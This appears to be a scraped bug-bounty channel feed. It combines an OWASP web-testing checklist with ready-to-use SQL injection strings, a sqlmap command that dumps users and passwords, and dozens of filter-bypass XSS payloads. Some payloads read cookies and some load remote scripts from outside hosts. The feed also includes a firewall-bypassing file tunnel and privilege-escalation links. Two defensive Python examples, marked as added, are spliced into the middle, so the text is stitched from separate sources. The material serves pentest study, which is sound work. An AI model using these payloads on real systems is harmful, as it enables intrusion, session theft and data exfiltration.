Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie
[+] Denial of Service
Test for anti-automation
Test for account lockout
Test for HTTP protocol DoS
Test for SQL wildcard DoS
[+] Business Logic
Test for feature misuse
Test for lack of non-repudiation
Test for trust relationships
Test for integrity of data
Test segregation of duties
[+] Cryptography
Check if data which should be encrypted is not
Check for wrong algorithms usage depending on context
Check for weak algorithms usage
Check for proper use of salting
Check for randomness functions
[+] Risky Functionality - File Uploads
Test that acceptable file types are whitelisted
Test that file size limits, upload frequency and total file counts are defined and are enforced
Test that file contents match the defined file type
Test that all file uploads have Anti-Virus scanning in-place.
Test that unsafe filenames are sanitised
Test that uploaded files are not directly accessible within the web root
Test that uploaded files are not served on the same hostname/port
Test that files and other media are integrated with the authentication and authorisation schemas
[+] Risky Functionality - Card Payment
Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF
[+] HTML 5
Test Web Messaging
Test for Web Storage SQL injection
Check CORS implementation
Check Offline Web Application
OWASP CHECKLIST
[+] Information Gathering
Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
Perform Web Application Fingerprinting
Identify technologies used
Identify user roles
Identify application entry points
Identify client-side code
Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
Identify co-hosted and related applications
Identify all hostnames and ports
Identify third-party hosted content
[+] Configuration Management
Check for commonly used application and administrative URLs
Check for old, backup and unreferenced files
Check HTTP methods supported and Cross Site Tracing (XST)
Test file extensions handling
Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
Test for policies (e.g. Flash, Silverlight, robots)
Test for non-production data in live environment, and vice-versa
Check for sensitive data in client-side code (e.g. API keys, credentials)
[+] Secure Transmission
Check SSL Version, Algorithms, Key length
Check for Digital Certificate Validity (Duration, Signature and CN)
Check credentials only delivered over HTTPS
Check that the login form is delivered over HTTPS
Check session tokens only delivered over HTTPS
Check if HTTP Strict Transport Security (HSTS) in use
[+] Authentication
Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (eg Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of-channel notification of account lockouts and successful password changes
Test for consistent authentication across applications with shared authentication schema / SSO
[+] Session Management
Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
Check session tokens for cookie flags (httpOnly and secure)
Check session cookie scope (path and domain)
Check session cookie duration (expires and max-age)
Check session termination after a maximum lifetime
Check session termination after relative timeout
Check session termination after logout
Test to see if users can have multiple simultaneous sessions
Test session cookies for randomness
Confirm that new session tokens are issued on login, role change and logout
Test for consistent session management across applications with shared session management
Test for session puzzling
Test for CSRF and clickjacking
[+] Authorization
Test for path traversal
Test for bypassing authorization schema
Test for vertical Access control problems (a.k.a. Privilege Escalation)
Test for horizontal Access control problems (between two users at the same privilege level)
Test for missing authorization
[+] Data Validation
Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter
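As an added example (not from the channel or from the OWASP checklist itself), a small Python audit that applies the Session Management and Configuration Management items above, the httpOnly/secure cookie flags, cookie scope and duration, and the CSP, X-Frame-Options and HSTS headers, to a constructed set of response headers; the session cookie name is an assumed parameter.

```python
from typing import Dict, List, Tuple

# Constructed sample response headers for the demonstration (not from the page).
SAMPLE_HEADERS: List[Tuple[str, str]] = [
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure"),
    ("Set-Cookie", "prefs=dark; Path=/; HttpOnly; Max-Age=86400"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Frame-Options", "DENY"),
]

# Checklist items that map to a single required response header.
REQUIRED_HEADERS = {
    "content-security-policy": "CSP header",
    "x-frame-options": "X-Frame-Options header",
    "strict-transport-security": "HSTS header",
}


def cookie_attrs(set_cookie: str) -> Dict[str, str]:
    """Return the attributes of a Set-Cookie value, names lower-cased."""
    attrs: Dict[str, str] = {}
    for part in set_cookie.split(";")[1:]:
        name, _, value = part.strip().partition("=")
        attrs[name.lower()] = value
    return attrs


def audit(headers: List[Tuple[str, str]], session_cookie: str = "sessionid") -> List[str]:
    """Apply the header and cookie checks; one finding string per failure."""
    findings: List[str] = []
    present = {name.lower() for name, _ in headers}
    for header, label in REQUIRED_HEADERS.items():
        if header not in present:
            findings.append(f"missing {label} ({header})")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie = value.split("=", 1)[0].strip()
        attrs = cookie_attrs(value)
        for flag in ("httponly", "secure"):  # cookie flags (httpOnly and secure)
            if flag not in attrs:
                findings.append(f"cookie {cookie}: missing {flag} flag")
        if "domain" in attrs:  # scope: an explicit Domain also covers subdomains
            findings.append(f"cookie {cookie}: Domain={attrs['domain']} widens scope")
        # duration: a session token with expires/max-age outlives the browser session
        if cookie == session_cookie and ("expires" in attrs or "max-age" in attrs):
            findings.append(f"cookie {cookie}: session token is persistent")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_HEADERS):
        print(finding)
```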
[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
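The `' or 1=1#` and UNION probes above are written for MySQL (`#` comment). As an added example that is not from the channel, the same bypass against a constructed SQLite table using its `--` comment, with the string-concatenated query beside the parameterised one that defeats it:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the demonstration (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> list:
    # String concatenation: the input becomes part of the SQL text, so
    # "' or 1=1--" turns the WHERE clause into a tautology and "--" drops the rest.
    sql = f"SELECT user FROM users WHERE user = '{user}' AND password = '{password}'"
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> list:
    # Bound parameters: the driver sends the input as a value, never as SQL.
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (user, password)))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "' or 1=1--", "x"))   # every user
    print("safe:      ", login_safe(db, "' or 1=1--", "x"))         # no match
    # The UNION version probe from the list, SQLite flavour:
    print("union:     ", login_vulnerable(db, "' UNION SELECT sqlite_version()--", "x"))
```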
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
Some of the top payloads which are used while practicing OSCP.
Pentesting Collection
Privilege Escalation
- Blog: Windows Privilege Escalation (Collection)
- Blog: Linux Privilege Escalation (Collection)
- Blog: Privilege Escalation via fail2ban
- Github: GossiTheDog/SystemNightMare
- Github: PEASS-ng
- Blogpost: NFS PrivEsc
- Blogpost: Bypassing the default UAC manually
- Github: CLSIDs for JP
- Blogpost: Using PetitPotam to NTLM Relay to Domain Administrator
- Paper: Abusing Kerberos: Kerberoasting
- Github: Kerberoast
- GitHub: aclpwn.py
- Can be used to perform DCsync attacks and abuse the DACL
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
11-year-old article
Today, I successfully discovered multiple directory listings. Here’s a quick guide to help you do the same:
1. Select Your Target: Identify the target website you want to test.
2. Use Request Intruder: Utilize tools like Burp Suite's Intruder to automate the process.
3. Set Positions: Configure the positions in your request, e.g., target.com/{wordlist}/.
4. Analyze Responses: Examine the status codes and response lengths to identify valid directories.
credit to respected owner.
Just Reported XSS at Hackerone
Payload used:
"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS%2f.source)>"%2c
$23 Million Bounty
WazirX Hunt Down bounty program
https://wazirx.com/blog/wazirx-bounty-program/
🥪Some XSS Payloads 😅
XSS Payloads
javascripta:alert(xss)//
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
onpointerenter%3Dconfirm%281%29
<inpuT autofocus oNFocus="setTimeout(function() { /*/top'al'+'\u0065'+'rt'/*/ }, 5000);"></inpuT%3E;
"><img/src/onerror=.1|alert``
Set.constructoralert\x28document.domain\x29``
";alert('XSS');//
alert][0].call(this,1)
wp-json/wp/v2/
"><a href=javascript:alert(1)
<script>onerror=alert;throw'hacked';</script>
''"><script>(1)</script><iFrAme/src=jaVascRipt:prompt.valueOf()(1)+class=shetty></iFramE>
javascript:alert(document.cookie)
javascript://%0aalert(1)
"><script>alert(hello)</script>
<scri00pt0>eval[(1)]</sc00rip00t>
{{0[a='constructor'][a')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{].pop.constructor('alert\u00281\u0029')()}}
<svg><script%20?>confirm(1)
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg%2Fonload%3Deval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D’))>
<a href="javascript:alert(1)">Click Here</a>
<svg+onload='<script'-alert(1)>
<ScRiPt>alert(document.domain)</ScRiPt>
<ScRiPt/random>alert(document.domain);</ScRiPt>
<src<ScRiPt/random>ipt>alert(document.domain);<src</ScRiPt>ipt>
<scr\x00ipt>alert(document.domain)<scr\x00ipt>
"><img src=x onerror=alert(document.domain)>
"><!--><svg/onload=alert(document.domain)>
<iframe%00src="	javascript:prompt(document.domain)	%00>
<img src=1 onerror=print()>
<script>alert(document.domain)</script>
"onmousemove=alert("XSS_BY_shetty") "
<svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>>
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert(document.cookie)>
<sVG/oNLY%3d1/*/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><IMg%20SrC=x%20onerror=prompt(xss)>
<Svg%20On%20Only=1%20Onload=alert(1)>"
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb/['al'%2b'ert';//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=a
alert(origin)>
🔗 @bugbounty_tech 🔗
I got sick, I will be back by tomorrow and new BugBounty program is coming tomorrow
File-Tunnel
Tunnel TCP connections through a file. The program starts a TCP listener, and when a connection is received it writes the TCP data into a file. This same file is read by the counterpart program, which establishes a TCP connection and forwards the TCP data on. To avoid the shared file growing indefinitely, it is purged whenever it gets larger than 10 MB.
Example 1 - Bypassing a firewall
You'd like to connect from Host A to Host B, but a firewall is in the way. But both hosts have access to a shared folder.
Host A:
ft.exe --tcp-listen 127.0.0.1:5000 --write "\\server\share\1.dat" --read "\\server\share\2.dat"
Host B:
ft.exe --read "\\server\share\1.dat" --tcp-connect 127.0.0.1:3389 --write "\\server\share\2.dat"
Now on Host A, configure the client to connect to: 127.0.0.1:5000
Example 2 - Tunnel TCP through RDP (similar to SSH tunnel)
You'd like to connect to a remote service (eg. 192.168.1.50:8888), but only have access to Host B using RDP.
Host A:
ft.exe --tcp-listen 127.0.0.1:5000 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"
Run an RDP client and ensure local drives are shared as shown here. Connect to Host B.
Host B:
ft.exe --read "\\tsclient\c\Temp\1.dat" --tcp-connect 192.168.1.50:8888 --write "\\tsclient\c\Temp\2.dat"
Now on Host A, you can connect to 127.0.0.1:5000 and it will be forwarded to 192.168.1.50:8888
📚Web Application Penetration testing Study Plan
📝This study plan is based on milestones. So, check how much you can cover and close the checkboxes. The more you close, the better candidate you are for the job role. Also, I assume you have already checked and are comfortable with the Common Security Skills study plan.
Just to make sure that everyone understands what you need to learn to be a pentester: it is altogether different from bug bounty, Red Team etc., but to excel in any of those roles you should be good at pentesting. It's not necessary that you can be a Red Teamer or bug bounty hunter if you know pentesting, but a red teamer is surely very good at pentesting. Also, vulnerability assessment is not pentesting; however, VAPT is a common skill required for pentester jobs.
🔗https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md
🔖#infosec #cybersecurity #hacking #pentesting #security
💉SQL Injection Vulnerability Scanner Tools
🔹SQLMap – Automatic SQL Injection And Database Takeover Tool
🔗https://github.com/sqlmapproject/sqlmap
🔹jSQL Injection – Java Tool For Automatic SQL Database Injection
🔗https://github.com/ron190/jsql-injection
🔹BBQSQL – A Blind SQL-Injection Exploitation Tool
🔗https://github.com/Neohapsis/bbqsql
🔹NoSQLMap – Automated NoSQL Database Pwnage
🔗 https://github.com/codingo/NoSQLMap
🔹Whitewidow – SQL Vulnerability Scanner
🔗https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html
🔹DSSS – Damn Small SQLi Scanner
🔗https://github.com/stamparm/DSSS
🔹explo – Human And Machine Readable Web Vulnerability Testing Format
🔗https://github.com/dtag-dev-sec/explo
🔹Blind-Sql-Bitshifting – Blind SQL-Injection via Bitshifting
🔗https://github.com/awnumar/blind-sql-bitshifting
🔹Leviathan – Wide Range Mass Audit Toolkit
🔗https://github.com/leviathan-framework/leviathan
🔹Blisqy – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB)
🔗https://github.com/JohnTroony/Blisqy
🔖#infosec #cybersecurity #hacking #pentesting #security
🚀Found a subdomain running on Symfony debug mode.
👾Tip: Use EOS (https://github.com/synacktiv/eos) to get PHP variables and a lot more.
#BugBounty #bugbountytips #vulnerability